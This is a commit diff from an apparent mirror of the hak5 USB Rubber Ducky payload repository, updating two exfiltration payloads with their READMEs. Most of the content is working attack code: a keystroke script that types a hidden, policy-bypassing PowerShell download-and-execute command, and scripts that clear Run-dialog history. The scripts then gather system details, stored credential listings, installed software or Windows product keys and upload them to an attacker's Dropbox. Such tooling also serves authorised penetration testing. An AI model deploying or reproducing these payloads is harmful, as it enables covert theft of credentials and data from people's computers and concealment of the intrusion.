hak5
/
usbrubberducky-payloads
mirror of https://github.com/hak5/usbrubberducky-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Small updates

pull/431/head
Julien M 2024-06-02 13:25:50 +02:00
parent ea737c4c6d
commit 3da90fee4d
6 changed files with 230 additions and 228 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

96
payloads/library/exfiltration/Windows-Privilege-Excalibur/README.md
View File

@ -1,48 +1,48 @@
## Windows Privilege Excalibur
<p>
<a href="https://payloadstudio.hak5.org/community/?device=usb-rubber-ducky&viewurl=https://raw.githubusercontent.com/hak5/usbrubberducky-payloads/master/payloads/library/exfiltration/Windows-Privilege-Excalibur/payload.txt">
<img alt="View on: Payload Studio" src="https://img.shields.io/badge/View_on-Payload_Studio-red?style=flat-square">
</a>
<a href="#">
<img alt="Target: Windows 10, 11" src="https://img.shields.io/badge/Target-Windows_10,_11-blue?style=flat-square">
</a>
</p>
This payload sends you a brief user privilege escalation report via Dropbox. Once you have the report, you can perform further privilege escalation analysis, including using the following resources:
|Report Category|Useful Resources|
|-|-|
|System Information|[WES-NG](https://github.com/bitsadmin/wesng)|
|User Information|[Priv2Admin](https://github.com/gtworek/Priv2Admin)|
|Stored Credentials||
|Installed Programs|[Exploit Database](https://www.exploit-db.com) & [Packet Storm](https://packetstormsecurity.com)|
<details>
<summary>Extension operation</summary>
1. Detects when the USB Rubber Ducky is ready and whether the target operating system is Windows.
2. Opens a Windows Run dialog box.
3. Executes a hosted PowerShell script that performs the following actions:
- Clears the history of the Windows Run menu.
- Prepares a report on target PC user privilege escalation.
- Sends the report to a file in your Dropbox.
</details>
## Prerequisites
First of all, you need to set up an appropriate Dropbox exfiltration "App" to obtain your "app key", "app secret" and "refresh token", which you can do by following the quick tutorial available [here](https://github.com/PlumpyTurkey/Ducky-Utilities/tree/main/PowerShell-Functions/Send-ToDropbox).
Once you get them, you need to download the "script.ps1" file for this payload and edit it to add the values for your "App". Once you've done that, all you need to do is host the modified file and make it downloadable from a URL that you set as an option for this payload.
> Note: If you're using Dropbox to host your script, make sure the download link for your script ends with "dl=1" and not "dl=0".
## Options
|Required extension options|Extension|Data type|Default value|Description|
|-|-|-|-|-|
|RHP_SCRIPT_URL|Run Hosted PowerShell|String|example.com|Your PowerShell script download link|
## Contributors
- [@PlumpyTurkey](https://github.com/PlumpyTurkey)
## Windows Privilege Excalibur
<p>
<a href="https://payloadstudio.hak5.org/community/?device=usb-rubber-ducky&viewurl=https://raw.githubusercontent.com/hak5/usbrubberducky-payloads/master/payloads/library/exfiltration/Windows-Privilege-Excalibur/payload.txt">
<img alt="VIEW ON: HAK5 PAYLOADSTUDIO" src="https://img.shields.io/badge/VIEW_ON-HAK5_PAYLOADSTUDIO-red?style=for-the-badge">
</a>
<a href="#">
<img alt="TARGET: WINDOWS 10, 11" src="https://img.shields.io/badge/TARGET-WINDOWS_10,_11-blue?style=for-the-badge">
</a>
<a href="#">
<img alt="VERSION: 1.3" src="https://img.shields.io/badge/VERSION-1.3-green?style=for-the-badge">
</a>
</p>
This payload sends you a brief user privilege escalation report via Dropbox. Once you have the report, you can perform further privilege escalation analysis, including using the following resources:
|Report Category|Useful Resources|
|-|-|
|System Information|[WES-NG](https://github.com/bitsadmin/wesng)|
|User Information|[Priv2Admin](https://github.com/gtworek/Priv2Admin)|
|Stored Credentials||
|Installed Programs|[Exploit Database](https://www.exploit-db.com/) & [Packet Storm](https://packetstormsecurity.com/)|
## Process
1. Detects when the USB Rubber Ducky is ready and whether the target operating system is Windows.
2. Opens a Windows Run dialog box.
3. Executes a hosted PowerShell script that performs the following actions:
- Clears the history of the Windows Run menu.
- Prepares a report on target PC user privilege escalation.
- Sends the report to a file in your Dropbox.
## Prerequisites
First of all, you need to set up an appropriate Dropbox exfiltration "App" to obtain your "app key", "app secret" and "refresh token", which you can do by following the quick tutorial available [here](https://codeberg.org/PlumpyTurkey/Ducky-Utilities/src/branch/main/PowerShell-Functions/Send-ToDropbox). Once you get them, you need to download the "script.ps1" file for this payload and edit it to add the values for your "App". Once you've done that, all you need to do is host the modified file and make it downloadable from a URL that you set as an option for this payload.
> [!WARNING]
> If you're using Dropbox to host your script, make sure the download link for your script ends with "dl=1" and not "dl=0".
## Options
|Required extension options|Extension|Data type|Default value|Description|
|-|-|-|-|-|
|RHP_SCRIPT_URL|Run Hosted PowerShell|String|example.com|Your PowerShell script download link|
## Contributors
- [PlumpyTurkey](https://codeberg.org/PlumpyTurkey)

213
payloads/library/exfiltration/Windows-Privilege-Excalibur/payload.txt
View File

@ -1,106 +1,107 @@
REM_BLOCK DOCUMENTATION
Title: Windows Privilege Excalibur
Author: PlumpyTurkey
Description: This payload sends you a brief user privilege escalation report via Dropbox.
Target: Windows 10, 11
Version: 1.3
Category: Exfiltration
END_REM
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
EXTENSION WINDOWS_ONLY
REM VERSION 1.0
REM AUTHOR: Korben
DEFINE #FAILURE_LED TRUE
DEFINE #FAILURE_LED_MODE LED_R
DEFINE #FAILURE_ATTACKMODE ATTACKMODE OFF
IF (($_OS == WINDOWS) == FALSE) THEN
IF_DEFINED_TRUE #FAILURE_LED
#FAILURE_LED_MODE
DELAY 500
#FAILURE_LED_MODE
DELAY 500
#FAILURE_LED_MODE
END_IF_DEFINED
#FAILURE_ATTACKMODE
STOP_PAYLOAD
END_IF
END_EXTENSION
EXTENSION RUN_HOSTED_POWERSHELL
REM_BLOCK DOCUMENTATION
Title: Run Hosted PowerShell
Author: PlumpyTurkey
Description: This extension executes a hosted PowerShell script using the Windows Run dialog box.
Target: Windows 10, 11
Version: 1.0
END_REM
REM Required options:
DEFINE #RHP_SCRIPT_URL example.com
REM Advanced options:
DEFINE #RHP_DELAY 2000
DEFINE #RHP_ELEVATED_EXECUTION FALSE
DEFINE #RHP_DISABLE_AFTER_EXECUTION FALSE
GUI r
DELAY #RHP_DELAY
STRING PowerShell -W H -EX Bypass "IWR -UseB '#RHP_SCRIPT_URL' | IEX"
IF_DEFINED_TRUE #RHP_ELEVATED_EXECUTION
CTRL SHIFT ENTER
DELAY #RHP_DELAY
LEFT
END_IF_DEFINED
ENTER
IF_DEFINED_TRUE #RHP_DISABLE_AFTER_EXECUTION
ATTACKMODE OFF
END_IF_DEFINED
END_EXTENSION
REM_BLOCK DOCUMENTATION
Title: Windows Privilege Excalibur
Author: PlumpyTurkey
Description: This payload sends you a brief user privilege escalation report via Dropbox.
Target: Windows 10, 11
Version: 1.3
Category: Exfiltration
END_REM
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
EXTENSION WINDOWS_ONLY
REM VERSION 1.0
REM AUTHOR: Korben
DEFINE #FAILURE_LED TRUE
DEFINE #FAILURE_LED_MODE LED_R
DEFINE #FAILURE_ATTACKMODE ATTACKMODE OFF
IF (($_OS == WINDOWS) == FALSE) THEN
IF_DEFINED_TRUE #FAILURE_LED
#FAILURE_LED_MODE
DELAY 500
#FAILURE_LED_MODE
DELAY 500
#FAILURE_LED_MODE
END_IF_DEFINED
#FAILURE_ATTACKMODE
STOP_PAYLOAD
END_IF
END_EXTENSION
EXTENSION RUN_HOSTED_POWERSHELL
REM_BLOCK DOCUMENTATION
Title: Run Hosted PowerShell
Author: PlumpyTurkey
Description: This extension executes a hosted PowerShell script using the Windows Run dialog box.
Target: Windows 10, 11
Version: 1.0
END_REM
REM Required options:
DEFINE #RHP_SCRIPT_URL example.com
REM Advanced options:
DEFINE #RHP_DELAY 2000
DEFINE #RHP_ELEVATED_EXECUTION FALSE
DEFINE #RHP_DISABLE_AFTER_EXECUTION FALSE
GUI r
DELAY #RHP_DELAY
STRING PowerShell -W H -EX Bypass "IWR -UseB '#RHP_SCRIPT_URL' | IEX"
IF_DEFINED_TRUE #RHP_ELEVATED_EXECUTION
CTRL SHIFT ENTER
DELAY #RHP_DELAY
LEFT
END_IF_DEFINED
ENTER
IF_DEFINED_TRUE #RHP_DISABLE_AFTER_EXECUTION
ATTACKMODE OFF
END_IF_DEFINED
END_EXTENSION

98
payloads/library/exfiltration/Windows-Privilege-Excalibur/script.ps1
View File

@ -1,49 +1,49 @@
$REFRESH_TOKEN = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
$APP_KEY = "XXXXXXXXXXXXXXX"
$APP_SECRET = "XXXXXXXXXXXXXXX"
function Send-ToDropbox {
#Documentation: https://github.com/PlumpyTurkey/Ducky-Utilities/tree/main/PowerShell-Functions/Send-ToDropbox
[CmdletBinding()]
param(
[Parameter(Mandatory = $true)]
[string]$RefreshToken,
[Parameter(Mandatory = $true)]
[string]$AppKey,
[Parameter(Mandatory = $true)]
[string]$AppSecret,
[Parameter(Mandatory = $true)]
[string]$Content,
[string]$OutputFolder = "Exfiltrated-content",
[string]$OutputFile = "[${env:COMPUTERNAME}-${env:USERNAME}].txt"
)
try {
$AccessToken = (Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method Post -Headers @{
"Content-Type" = "application/x-www-form-urlencoded"
} -Body @{
"grant_type" = "refresh_token"
"refresh_token" = $RefreshToken
"client_id" = $AppKey
"client_secret" = $AppSecret
}).access_token
Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method Post -Headers @{
"Authorization" = "Bearer $AccessToken"
"Content-Type" = "application/octet-stream"
"Dropbox-API-Arg" = "{""path"":""/$OutputFolder/$OutputFile"",""mode"":""add"",""autorename"":true,""mute"":false}"
} -Body $Content | Out-Null
}
catch {
Write-Host "An error occurred: $_"
}
}
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force
$Report = "*** System Information ***`n $(SYSTEMINFO | Out-String)`n"
$Report += "*** User Information ***`n $(WHOAMI /ALL | Out-String)`n"
$Report += "*** Stored Credentials ***`n $(CMDKEY /LIST | Out-String)`n"
$Report += "*** Installed Programs ***`n $(Get-ItemProperty 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*' | Select-Object DisplayName, DisplayVersion, Publisher | Out-String)"
Send-ToDropbox -RefreshToken $REFRESH_TOKEN -AppKey $APP_KEY -AppSecret $APP_SECRET -Content $Report
$REFRESH_TOKEN = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
$APP_KEY = "XXXXXXXXXXXXXXX"
$APP_SECRET = "XXXXXXXXXXXXXXX"
function Send-ToDropbox {
[CmdletBinding()]
param(
[Parameter(Mandatory = $true)]
[string]$Content,
[Parameter(Mandatory = $true)]
[string]$RefreshToken,
[Parameter(Mandatory = $true)]
[string]$AppKey,
[Parameter(Mandatory = $true)]
[string]$AppSecret,
[string]$OutputFolder = "Exfiltrated-content",
[string]$OutputFile = "[${env:COMPUTERNAME}-${env:USERNAME}].txt"
)
try {
Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method Post -Headers @{
"Authorization" = "Bearer $((
Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method Post -Headers @{
"Content-Type" = "application/x-www-form-urlencoded"
} -Body @{
"grant_type" = "refresh_token";
"refresh_token" = $RefreshToken;
"client_id" = $AppKey;
"client_secret" = $AppSecret
}
).access_token)";
"Content-Type" = "application/octet-stream";
"Dropbox-API-Arg" = "{""path"":""/$OutputFolder/$OutputFile"",""mode"":""add"",""autorename"":true,""mute"":false}"
} -Body $Content | Out-Null
}
catch {
Write-Host "An error occurred: $_"
}
}
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force
$Report = "*** System Information ***`n $(SYSTEMINFO | Out-String)`n"
$Report += "*** User Information ***`n $(WHOAMI /ALL | Out-String)`n"
$Report += "*** Stored Credentials ***`n $(CMDKEY /LIST | Out-String)`n"
$Report += "*** Installed Programs ***`n $(Get-ItemProperty 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*' | Select-Object DisplayName, DisplayVersion, Publisher | Out-String)"
Send-ToDropbox -Content $Report -RefreshToken $REFRESH_TOKEN -AppKey $APP_KEY -AppSecret $APP_SECRET

20
payloads/library/exfiltration/Windows-Product-Key-Grabber/README.md
View File

@ -2,17 +2,19 @@
<p>
<a href="https://payloadstudio.hak5.org/community/?device=usb-rubber-ducky&viewurl=https://raw.githubusercontent.com/hak5/usbrubberducky-payloads/master/payloads/library/exfiltration/Windows-Product-Key-Grabber/payload.txt">
<img alt="View on: Payload Studio" src="https://img.shields.io/badge/View_on-Payload_Studio-red?style=flat-square">
<img alt="VIEW ON: HAK5 PAYLOADSTUDIO" src="https://img.shields.io/badge/VIEW_ON-HAK5_PAYLOADSTUDIO-red?style=for-the-badge">
</a>
<a href="#">
<img alt="Target: Windows 10, 11" src="https://img.shields.io/badge/Target-Windows_10,_11-blue?style=flat-square">
<img alt="TARGET: WINDOWS 10, 11" src="https://img.shields.io/badge/TARGET-WINDOWS_10,_11-blue?style=for-the-badge">
</a>
<a href="#">
<img alt="VERSION: 1.0" src="https://img.shields.io/badge/VERSION-1.0-green?style=for-the-badge">
</a>
</p>
This payload sends you the target PC's Windows product key via Dropbox.
<details>
<summary>Extension operation</summary>
## Process
1. Detects when the USB Rubber Ducky is ready and whether the target operating system is Windows.
2. Opens a Windows Run dialog box.
@ -21,14 +23,12 @@ This payload sends you the target PC's Windows product key via Dropbox.
- Recovers Windows product key from target PC.
- Sends the Windows product key of the target PC to a file in your Dropbox.
</details>
## Prerequisites
First of all, you need to set up an appropriate Dropbox exfiltration "App" to obtain your "app key", "app secret" and "refresh token", which you can do by following the quick tutorial available [here](https://github.com/PlumpyTurkey/Ducky-Utilities/tree/main/PowerShell-Functions/Send-ToDropbox).
Once you get them, you need to download the "script.ps1" file for this payload and edit it to add the values for your "App". Once you've done that, all you need to do is host the modified file and make it downloadable from a URL that you set as an option for this payload.
First of all, you need to set up an appropriate Dropbox exfiltration "App" to obtain your "app key", "app secret" and "refresh token", which you can do by following the quick tutorial available [here](https://codeberg.org/PlumpyTurkey/Ducky-Utilities/src/branch/main/PowerShell-Functions/Send-ToDropbox). Once you get them, you need to download the "script.ps1" file for this payload and edit it to add the values for your "App". Once you've done that, all you need to do is host the modified file and make it downloadable from a URL that you set as an option for this payload.
> Note: If you're using Dropbox to host your script, make sure the download link for your script ends with "dl=1" and not "dl=0".
> [!WARNING]
> If you're using Dropbox to host your script, make sure the download link for your script ends with "dl=1" and not "dl=0".
## Options
@ -38,4 +38,4 @@ Once you get them, you need to download the "script.ps1" file for this payload a
## Contributors
- [@PlumpyTurkey](https://github.com/PlumpyTurkey)
- [PlumpyTurkey](https://codeberg.org/PlumpyTurkey)

3
payloads/library/exfiltration/Windows-Product-Key-Grabber/payload.txt
View File

@ -89,6 +89,7 @@ EXTENSION RUN_HOSTED_POWERSHELL
DEFINE #RHP_DISABLE_AFTER_EXECUTION FALSE
GUI r
DELAY #RHP_DELAY
STRING PowerShell -W H -EX Bypass "IWR -UseB '#RHP_SCRIPT_URL' | IEX"
@ -99,7 +100,7 @@ EXTENSION RUN_HOSTED_POWERSHELL
END_IF_DEFINED
ENTER
IF_DEFINED_TRUE #RHP_DISABLE_AFTER_EXECUTION
ATTACKMODE OFF
END_IF_DEFINED

28
payloads/library/exfiltration/Windows-Product-Key-Grabber/script.ps1
View File

@ -3,34 +3,33 @@ $APP_KEY = "XXXXXXXXXXXXXXX"
$APP_SECRET = "XXXXXXXXXXXXXXX"
function Send-ToDropbox {
#Documentation: https://github.com/PlumpyTurkey/Ducky-Utilities/tree/main/PowerShell-Functions/Send-ToDropbox
[CmdletBinding()]
param(
[Parameter(Mandatory = $true)]
[string]$Content,
[Parameter(Mandatory = $true)]
[string]$RefreshToken,
[Parameter(Mandatory = $true)]
[string]$AppKey,
[Parameter(Mandatory = $true)]
[string]$AppSecret,
[Parameter(Mandatory = $true)]
[string]$Content,
[string]$OutputFolder = "Exfiltrated-content",
[string]$OutputFile = "[${env:COMPUTERNAME}-${env:USERNAME}].txt"
)
try {
$AccessToken = (Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method Post -Headers @{
Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method Post -Headers @{
"Authorization" = "Bearer $((
Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method Post -Headers @{
"Content-Type" = "application/x-www-form-urlencoded"
} -Body @{
"grant_type" = "refresh_token"
"refresh_token" = $RefreshToken
"client_id" = $AppKey
"grant_type" = "refresh_token";
"refresh_token" = $RefreshToken;
"client_id" = $AppKey;
"client_secret" = $AppSecret
}).access_token
Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method Post -Headers @{
"Authorization" = "Bearer $AccessToken"
"Content-Type" = "application/octet-stream"
}
).access_token)";
"Content-Type" = "application/octet-stream";
"Dropbox-API-Arg" = "{""path"":""/$OutputFolder/$OutputFile"",""mode"":""add"",""autorename"":true,""mute"":false}"
} -Body $Content | Out-Null
}
@ -39,9 +38,10 @@ function Send-ToDropbox {
}
}
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force
$ProductKey = "Original Product Key: $((Get-WmiObject -Query 'select * from SoftwareLicensingService').OA3xOriginalProductKey | Out-String)`n"
$ProductKey += "Backup Product Key: $((Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform').BackupProductKeyDefault | Out-String)"
Send-ToDropbox -RefreshToken $REFRESH_TOKEN -AppKey $APP_KEY -AppSecret $APP_SECRET -Content $ProductKey
Send-ToDropbox -Content $ProductKey -RefreshToken $REFRESH_TOKEN -AppKey $APP_KEY -AppSecret $APP_SECRET